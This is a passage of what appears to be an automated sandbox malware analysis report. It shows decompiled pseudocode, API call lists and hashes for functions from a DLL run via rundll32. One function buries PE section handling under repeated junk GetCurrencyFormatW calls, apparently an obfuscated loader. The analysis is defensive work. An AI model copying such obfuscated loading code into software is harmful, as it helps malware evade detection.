                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormat$memcpymemset
                                                                                                            • String ID: ($eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 2888895459-2712681272
                                                                                                            • Opcode ID: 3e584bf575076d2f861363e2cb4f4e983203ccea50c86de04f033ec7f5290706
                                                                                                            • Instruction ID: 346e2bfed80208adbbea8c92dee40ae63694b643ed2e5d5183bbf84c561662e4
                                                                                                            • Opcode Fuzzy Hash: 3e584bf575076d2f861363e2cb4f4e983203ccea50c86de04f033ec7f5290706
                                                                                                            • Instruction Fuzzy Hash: B1A159B1644344BFE208DB95CD86F2BBBECEB8AB48F011419F745DB2D1C671E9108B65
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10005EFE Relevance: 45.7, APIs: 21, Strings: 5, Instructions: 229registrylibraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 84%
                                                                                                            			E10005EFE(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t73;
				struct HINSTANCE__* _t78;
				_Unknown_base(*)()* _t79;
				struct HINSTANCE__* _t81;
				signed int _t92;
				signed int _t94;
				unsigned int _t97;
				void* _t113;
				unsigned int _t115;
				signed short _t123;
				unsigned int _t124;
				_Unknown_base(*)()* _t131;
				signed short _t133;
				unsigned int _t134;
				intOrPtr _t143;
				void* _t144;
				int _t145;
				int _t146;
				signed int _t164;
				void* _t167;
				signed int _t169;
				void* _t170;
				int _t172;
				signed int _t176;
				void* _t177;
				CHAR* _t181;
				void* _t183;
				void* _t184;

				_t167 = __edx;
				_t184 = _t183 - 0x118;
				_t181 = _t184 - 4;
				_t73 =  *0x10045580; // 0x6a53a566
				_t181[0x118] = _t73 ^ _t181;
				_push(0x58);
				E1001FBC4(E10032F92, __ebx, __edi, __esi);
				_t169 = 0;
				 *(_t181 - 0x40) = _t181[0x124];
				 *(_t181 - 0x14) = 0;
				 *(_t181 - 0x10) = 0;
				_t78 = GetModuleHandleA("kernel32.dll");
				 *(_t181 - 0x18) = _t78;
				_t79 = GetProcAddress(_t78, "GetUserDefaultUILanguage");
				if(_t79 == 0) {
					if(GetVersion() >= 0) {
						_t81 = GetModuleHandleA("ntdll.dll");
						if(_t81 != 0) {
							 *(_t181 - 0x14) = 0;
							EnumResourceLanguagesA(_t81, 0x10, 1, E100056C3, _t181 - 0x14);
							if( *(_t181 - 0x14) != 0) {
								_t97 =  *(_t181 - 0x14) & 0x0000ffff;
								_t145 = _t97 & 0x3ff;
								 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t97 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t145);
								 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t145);
								 *(_t181 - 0x10) = 2;
							}
						}
					} else {
						 *(_t181 - 0x18) = 0;
						if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019, _t181 - 0x18) == 0) {
							 *(_t181 - 0x44) = 0x10;
							if(RegQueryValueExA( *(_t181 - 0x18), 0, 0, _t181 - 0x20,  &(_t181[0x108]), _t181 - 0x44) == 0 &&  *(_t181 - 0x20) == 1) {
								_t113 = E10021022( &(_t181[0x108]), "%x", _t181 - 0x1c);
								_t184 = _t184 + 0xc;
								if(_t113 == 1) {
									 *(_t181 - 0x14) =  *(_t181 - 0x1c) & 0x0000ffff;
									_t115 =  *(_t181 - 0x1c) & 0x0000ffff;
									_t146 = _t115 & 0x3ff;
									 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t115 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t146);
									 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t146);
									 *(_t181 - 0x10) = 2;
								}
							}
							RegCloseKey( *(_t181 - 0x18));
						}
					}
				} else {
					_t123 =  *_t79() & 0x0000ffff;
					 *(_t181 - 0x14) = _t123;
					_t124 = _t123 & 0x0000ffff;
					_t164 = _t124 & 0x3ff;
					 *(_t181 - 0x1c) = _t164;
					 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t124 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t164);
					 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale( *(_t181 - 0x1c));
					 *(_t181 - 0x10) = 2;
					_t131 = GetProcAddress( *(_t181 - 0x18), "GetSystemDefaultUILanguage");
					if(_t131 != 0) {
						_t133 =  *_t131() & 0x0000ffff;
						 *(_t181 - 0x14) = _t133;
						_t134 = _t133 & 0x0000ffff;
						_t172 = _t134 & 0x3ff;
						 *((intOrPtr*)(_t181 - 0x2c)) = ConvertDefaultLocale(_t134 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t172);
						 *((intOrPtr*)(_t181 - 0x28)) = ConvertDefaultLocale(_t172);
						 *(_t181 - 0x10) = 4;
					}
					_t169 = 0;
				}
				 *(_t181 - 0x10) =  &(1[ *(_t181 - 0x10)]);
				_t181[ *(_t181 - 0x10) * 4 - 0x34] = 0x800;
				_t181[0x105] = 0;
				_t181[0x104] = 0;
				if(GetModuleFileNameA(0x10000000, _t181, 0x105) != _t169) {
					_t143 = 0x20;
					E10020F40(_t169, _t181 - 0x64, _t169, _t143);
					 *((intOrPtr*)(_t181 - 0x64)) = _t143;
					 *(_t181 - 0x5c) = _t181;
					 *((intOrPtr*)(_t181 - 0x50)) = 0x3e8;
					 *(_t181 - 0x48) = 0x10000000;
					 *((intOrPtr*)(_t181 - 0x60)) = 0x88;
					E100056D9(_t181 - 0x3c, 0x10000000, 0xffffffff);
					 *(_t181 - 4) = _t169;
					if(E10005789(_t181 - 0x3c, _t181 - 0x64) != 0) {
						E100057BF(_t181 - 0x3c);
					}
					_t176 = 0;
					if( *(_t181 - 0x10) <= _t169) {
						L23:
						 *(_t181 - 4) =  *(_t181 - 4) | 0xffffffff;
						E10005DB0(_t181 - 0x3c);
						_t92 = _t169;
						goto L24;
					} else {
						while(1) {
							_t94 = E10005CE3(_t143,  *(_t181 - 0x40), _t167, _t169, _t181[_t176 * 4 - 0x34]);
							if(_t94 != _t169) {
								break;
							}
							_t176 =  &(1[_t176]);
							if(_t176 <  *(_t181 - 0x10)) {
								continue;
							}
							goto L23;
						}
						_t169 = _t94;
						goto L23;
					}
				} else {
					_t92 = 0;
					L24:
					 *[fs:0x0] =  *((intOrPtr*)(_t181 - 0xc));
					_pop(_t170);
					_pop(_t177);
					_pop(_t144);
					return E1001FBB5(_t92, _t144, _t181[0x118] ^ _t181, _t167, _t170, _t177);
				}
			}
































                                                                                                            0x10005efe
                                                                                                            0x10005eff
                                                                                                            0x10005f05
                                                                                                            0x10005f09
                                                                                                            0x10005f10
                                                                                                            0x10005f16
                                                                                                            0x10005f1d
                                                                                                            0x10005f2e
                                                                                                            0x10005f35
                                                                                                            0x10005f38
                                                                                                            0x10005f3b
                                                                                                            0x10005f3e
                                                                                                            0x10005f4c
                                                                                                            0x10005f4f
                                                                                                            0x10005f53
                                                                                                            0x10006021
                                                                                                            0x100060dd
                                                                                                            0x100060e1
                                                                                                            0x100060f5
                                                                                                            0x100060f8
                                                                                                            0x10006102
                                                                                                            0x10006108
                                                                                                            0x10006120
                                                                                                            0x1000612c
                                                                                                            0x10006131
                                                                                                            0x10006134
                                                                                                            0x10006134
                                                                                                            0x10006102
                                                                                                            0x10006027
                                                                                                            0x1000603b
                                                                                                            0x10006046
                                                                                                            0x1000605c
                                                                                                            0x1000606b
                                                                                                            0x10006083
                                                                                                            0x10006088
                                                                                                            0x1000608e
                                                                                                            0x1000609a
                                                                                                            0x1000609d
                                                                                                            0x100060af
                                                                                                            0x100060bb
                                                                                                            0x100060c0
                                                                                                            0x100060c3
                                                                                                            0x100060c3
                                                                                                            0x1000608e
                                                                                                            0x100060cd
                                                                                                            0x100060cd
                                                                                                            0x10006046
                                                                                                            0x10005f59
                                                                                                            0x10005f61
                                                                                                            0x10005f64
                                                                                                            0x10005f67
                                                                                                            0x10005f79
                                                                                                            0x10005f82
                                                                                                            0x10005f8a
                                                                                                            0x10005f97
                                                                                                            0x10005f9a
                                                                                                            0x10005fa1
                                                                                                            0x10005fa5
                                                                                                            0x10005fa9
                                                                                                            0x10005fac
                                                                                                            0x10005faf
                                                                                                            0x10005fbc
                                                                                                            0x10005fc8
                                                                                                            0x10005fcd
                                                                                                            0x10005fd0
                                                                                                            0x10005fd0
                                                                                                            0x10005fd7
                                                                                                            0x10005fd7
                                                                                                            0x10005fdc
                                                                                                            0x10005fdf
                                                                                                            0x10005ff6
                                                                                                            0x10005ffd
                                                                                                            0x1000600c
                                                                                                            0x10006142
                                                                                                            0x10006149
                                                                                                            0x10006159
                                                                                                            0x1000615c
                                                                                                            0x1000615f
                                                                                                            0x10006166
                                                                                                            0x10006169
                                                                                                            0x10006170
                                                                                                            0x1000617c
                                                                                                            0x10006186
                                                                                                            0x1000618b
                                                                                                            0x1000618b
                                                                                                            0x10006190
                                                                                                            0x10006195
                                                                                                            0x100061b2
                                                                                                            0x100061b2
                                                                                                            0x100061b9
                                                                                                            0x100061be
                                                                                                            0x00000000
                                                                                                            0x10006197
                                                                                                            0x10006197
                                                                                                            0x1000619e
                                                                                                            0x100061a6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100061a8
                                                                                                            0x100061ac
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100061ae
                                                                                                            0x100061b0
                                                                                                            0x00000000
                                                                                                            0x100061b0
                                                                                                            0x10006012
                                                                                                            0x10006012
                                                                                                            0x100061c0
                                                                                                            0x100061c3
                                                                                                            0x100061cb
                                                                                                            0x100061cc
                                                                                                            0x100061cd
                                                                                                            0x100061e2
                                                                                                            0x100061e2

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 10005F1D
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10005F3E
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10005F4F
                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 10005F85
                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 10005F8D
                                                                                                            • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10005FA1
                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 10005FC5
                                                                                                            • ConvertDefaultLocale.KERNEL32(000003FF), ref: 10005FCB
                                                                                                            • GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10006004
                                                                                                            • GetVersion.KERNEL32 ref: 10006019
                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 1000603E
                                                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 10006063
                                                                                                            • _sscanf.LIBCMT ref: 10006083
                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 100060B8
                                                                                                            • ConvertDefaultLocale.KERNEL32(76D84EE0), ref: 100060BE
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 100060CD
                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 100060DD
                                                                                                            • EnumResourceLanguagesA.KERNEL32 ref: 100060F8
                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 10006129
                                                                                                            • ConvertDefaultLocale.KERNEL32(76D84EE0), ref: 1000612F
                                                                                                            • _memset.LIBCMT ref: 10006149
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
                                                                                                            • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                                            • API String ID: 434808117-483790700
                                                                                                            • Opcode ID: 368d1d919a1a639eff12c1c674209e918f78b3616a3622e04850d242e1eb4b18
                                                                                                            • Instruction ID: 371a1abfdbbeaae06af34074570e4e6b8653269969333db2bd091179cc2368d9
                                                                                                            • Opcode Fuzzy Hash: 368d1d919a1a639eff12c1c674209e918f78b3616a3622e04850d242e1eb4b18
                                                                                                            • Instruction Fuzzy Hash: 22818FB5D002299FEB11DFA5DC84AFFBAF5EB48351F20452AE944E7280D7789A44CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10002482 Relevance: 42.3, APIs: 21, Strings: 3, Instructions: 327COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 97%
                                                                                                            			E10002482(intOrPtr* _a4) {
				int _v4;
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				void* __ebx;
				signed int _t117;
				signed int _t125;
				signed int _t150;
				signed int _t159;
				signed int _t160;
				signed int _t171;
				short* _t178;
				short* _t222;
				void* _t223;

				_t223 =  &_v40;
				_t178 = L"xadqsavcbdfewescGADW";
				_t222 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v24 =  *(GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440e0 * 0xf8 +  *_a4 + 0x14) & 0x0000ffff;
				_v24 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d0 * 0x28 + _v24;
				_v40 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440e0 + _v24 +  *_a4 + 0x18;
				if(( *0x10046ab4 & 0x00000001) == 0) {
					 *0x10046ab4 =  *0x10046ab4 | 0x00000001;
					 *0x10046ab0 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440e0;
				}
				_v20 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d0 +  *0x10046ab0 |  *(_v40 + 8);
				_v16 = E10001DB6(_v20, GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d4 +  *((intOrPtr*)(_a4 + 0x3c)));
				_v24 = E100021CE(_a4, GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d8 * 0x28 + _v40);
				_t117 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9);
				_v40 = _v40 + 0x28;
				_v8 =  *(_v40 + 0x24);
				_v12 = _v24 + _t117 *  *0x100440d8;
				_v4 = 0;
				_v32 = 1;
				if(GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d0 + ( *( *_a4 + 6) & 0x0000ffff) <= 1) {
					L13:
					_v4 = 1;
					_t125 = E1000227A( &_v20, _a4);
					asm("sbb eax, eax");
					return  ~( ~_t125);
				} else {
					do {
						_v24 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440e0 +  *(_v40 + 8);
						_v24 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d8 +  *0x10046ab0 | _v24;
						_v36 = E10001DB6(GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d8 +  *0x10046ab0 | _v24,  *((intOrPtr*)(_a4 + 0x3c)));
						_v28 = E100021CE(_a4, GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d0 * 0x28 + _v40);
						_v28 = _v28 + GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d0;
						if(_v16 == _v36 || _v12 + _v20 > GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440e0 + _v36) {
							if(( *(_v40 + 0x24) & GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440e0 + 0x02000000) == 0) {
								L10:
								_t150 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d0 - 0x02000001 & ( *(_v40 + 0x24) | _v8);
								L11:
								_v8 = _t150;
								_v12 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440e0 - _v20 + _v28 + _v24;
								goto L12;
							}
							_t159 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9);
							_t160 = _v8;
							if((_t160 & _t159 *  *0x100440e0 + 0x02000000) == 0) {
								goto L10;
							}
							_t150 = _t160 |  *(_v40 + 0x24);
							goto L11;
						} else {
							if(E1000227A(_t223 + 0x28 + GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d8 * 0x14, _a4) == 0) {
								return 0;
							}
							_v20 = _v24;
							_v16 = _v36;
							_t171 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, L"xadqsavcbdfewescGADW", 0x22b9);
							_t178 = L"xadqsavcbdfewescGADW";
							_v12 = _t171 *  *0x100440e0 + _v28;
							_v8 =  *(_v40 + 0x24);
						}
						L12:
						_v32 = _v32 + 1;
						_v40 = _v40 + 0x28;
					} while (_v32 < GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d0 + ( *( *_a4 + 6) & 0x0000ffff));
					goto L13;
				}
			}























                                                                                                            0x10002482
                                                                                                            0x10002494
                                                                                                            0x1000249c
                                                                                                            0x100024d0
                                                                                                            0x100024f0
                                                                                                            0x10002512
                                                                                                            0x10002516
                                                                                                            0x10002518
                                                                                                            0x10002534
                                                                                                            0x10002534
                                                                                                            0x10002567
                                                                                                            0x10002593
                                                                                                            0x100025bf
                                                                                                            0x100025c3
                                                                                                            0x100025d9
                                                                                                            0x100025e4
                                                                                                            0x100025ee
                                                                                                            0x100025f2
                                                                                                            0x100025f6
                                                                                                            0x10002616
                                                                                                            0x1000283b
                                                                                                            0x10002843
                                                                                                            0x1000284b
                                                                                                            0x10002852
                                                                                                            0x00000000
                                                                                                            0x1000261c
                                                                                                            0x1000261c
                                                                                                            0x10002644
                                                                                                            0x10002662
                                                                                                            0x1000267a
                                                                                                            0x100026a6
                                                                                                            0x100026c1
                                                                                                            0x100026c5
                                                                                                            0x10002787
                                                                                                            0x100027b7
                                                                                                            0x100027dc
                                                                                                            0x100027de
                                                                                                            0x100027ea
                                                                                                            0x10002803
                                                                                                            0x00000000
                                                                                                            0x10002803
                                                                                                            0x10002795
                                                                                                            0x100027a0
                                                                                                            0x100027ac
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100027b2
                                                                                                            0x00000000
                                                                                                            0x100026f2
                                                                                                            0x1000271a
                                                                                                            0x00000000
                                                                                                            0x1000285f
                                                                                                            0x10002731
                                                                                                            0x1000273c
                                                                                                            0x10002740
                                                                                                            0x1000274d
                                                                                                            0x10002752
                                                                                                            0x1000275d
                                                                                                            0x1000275d
                                                                                                            0x10002807
                                                                                                            0x10002807
                                                                                                            0x1000280b
                                                                                                            0x10002831
                                                                                                            0x00000000
                                                                                                            0x1000261c

                                                                                                            APIs
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100024AA
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100024D4
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100024F4
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000252B
                                                                                                              • Part of subcall function 10001DB6: GetCurrencyFormatW.KERNEL32 ref: 10001DCE
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10002545
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000256B
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10002597
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100025C3
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100025FE
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10002628
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10002648
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000267E
                                                                                                              • Part of subcall function 100021CE: GetCurrencyFormatW.KERNEL32 ref: 100021FF
                                                                                                              • Part of subcall function 100021CE: GetCurrencyFormatW.KERNEL32 ref: 10002222
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100026AA
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100026D7
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100026FE
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10002740
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10002772
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10002795
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100027C3
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100027EE
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000281C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormat
                                                                                                            • String ID: ($eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 3383288267-2712681272
                                                                                                            • Opcode ID: e752a4a7a8a42b0df952e79aab9ae48840a3d500f4805a10681732b9bc365d18
                                                                                                            • Instruction ID: aca6d6cc97a103aa38e8287a4bdca31c23581297dae163bc22dbee5c6a0af23b
                                                                                                            • Opcode Fuzzy Hash: e752a4a7a8a42b0df952e79aab9ae48840a3d500f4805a10681732b9bc365d18
                                                                                                            • Instruction Fuzzy Hash: 5DB16975648354BFE308CB50CD86F1BBBE8EB8AB48F11180EF7449A2D1C771E9508B65
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10026012 Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 91%
                                                                                                            			E10026012(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t37;
				void* _t40;
				void* _t42;

				_t30 = __ebx;
				_t37 = GetModuleHandleA("KERNEL32.DLL");
				if(_t37 != 0) {
					 *0x10048dc8 = GetProcAddress(_t37, "FlsAlloc");
					 *0x10048dcc = GetProcAddress(_t37, "FlsGetValue");
					 *0x10048dd0 = GetProcAddress(_t37, "FlsSetValue");
					_t7 = GetProcAddress(_t37, "FlsFree");
					__eflags =  *0x10048dc8;
					_t40 = TlsSetValue;
					 *0x10048dd4 = _t7;
					if( *0x10048dc8 == 0) {
						L6:
						 *0x10048dcc = TlsGetValue;
						 *0x10048dc8 = E10025CC9;
						 *0x10048dd0 = _t40;
						 *0x10048dd4 = TlsFree;
					} else {
						__eflags =  *0x10048dcc;
						if( *0x10048dcc == 0) {
							goto L6;
						} else {
							__eflags =  *0x10048dd0;
							if( *0x10048dd0 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					__eflags = _t10 - 0xffffffff;
					 *0x10045960 = _t10;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x10048dcc);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E10020E51();
							 *0x10048dc8 = E10025BFA( *0x10048dc8);
							 *0x10048dcc = E10025BFA( *0x10048dcc);
							 *0x10048dd0 = E10025BFA( *0x10048dd0);
							 *0x10048dd4 = E10025BFA( *0x10048dd4);
							_t18 = E10023E72();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E10025CFC();
								goto L15;
							} else {
								_push(E10025E88);
								_t21 =  *((intOrPtr*)(E10025C66( *0x10048dc8)))();
								__eflags = _t21 - 0xffffffff;
								 *0x1004595c = _t21;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E1002695E(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										_push(_t42);
										_push( *0x1004595c);
										__eflags =  *((intOrPtr*)(E10025C66( *0x10048dd0)))();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E10025D39(_t30, _t37, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E10025CFC();
					return 0;
				}
			}
















                                                                                                            0x10026012
                                                                                                            0x1002601e
                                                                                                            0x10026022
                                                                                                            0x10026042
                                                                                                            0x1002604f
                                                                                                            0x1002605c
                                                                                                            0x10026061
                                                                                                            0x10026063
                                                                                                            0x1002606a
                                                                                                            0x10026070
                                                                                                            0x10026075
                                                                                                            0x1002608d
                                                                                                            0x10026092
                                                                                                            0x1002609c
                                                                                                            0x100260a6
                                                                                                            0x100260ac
                                                                                                            0x10026077
                                                                                                            0x10026077
                                                                                                            0x1002607e
                                                                                                            0x00000000
                                                                                                            0x10026080
                                                                                                            0x10026080
                                                                                                            0x10026087
                                                                                                            0x00000000
                                                                                                            0x10026089
                                                                                                            0x10026089
                                                                                                            0x1002608b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002608b
                                                                                                            0x10026087
                                                                                                            0x1002607e
                                                                                                            0x100260b1
                                                                                                            0x100260b7
                                                                                                            0x100260ba
                                                                                                            0x100260bf
                                                                                                            0x10026191
                                                                                                            0x10026191
                                                                                                            0x10026191
                                                                                                            0x100260c5
                                                                                                            0x100260cc
                                                                                                            0x100260ce
                                                                                                            0x100260d0
                                                                                                            0x00000000
                                                                                                            0x100260d6
                                                                                                            0x100260d6
                                                                                                            0x100260ec
                                                                                                            0x100260fc
                                                                                                            0x1002610c
                                                                                                            0x10026119
                                                                                                            0x1002611e
                                                                                                            0x10026123
                                                                                                            0x10026125
                                                                                                            0x1002618c
                                                                                                            0x1002618c
                                                                                                            0x00000000
                                                                                                            0x10026127
                                                                                                            0x10026127
                                                                                                            0x10026138
                                                                                                            0x1002613a
                                                                                                            0x1002613d
                                                                                                            0x10026142
                                                                                                            0x00000000
                                                                                                            0x10026144
                                                                                                            0x10026150
                                                                                                            0x10026152
                                                                                                            0x10026156
                                                                                                            0x00000000
                                                                                                            0x10026158
                                                                                                            0x10026158
                                                                                                            0x10026159
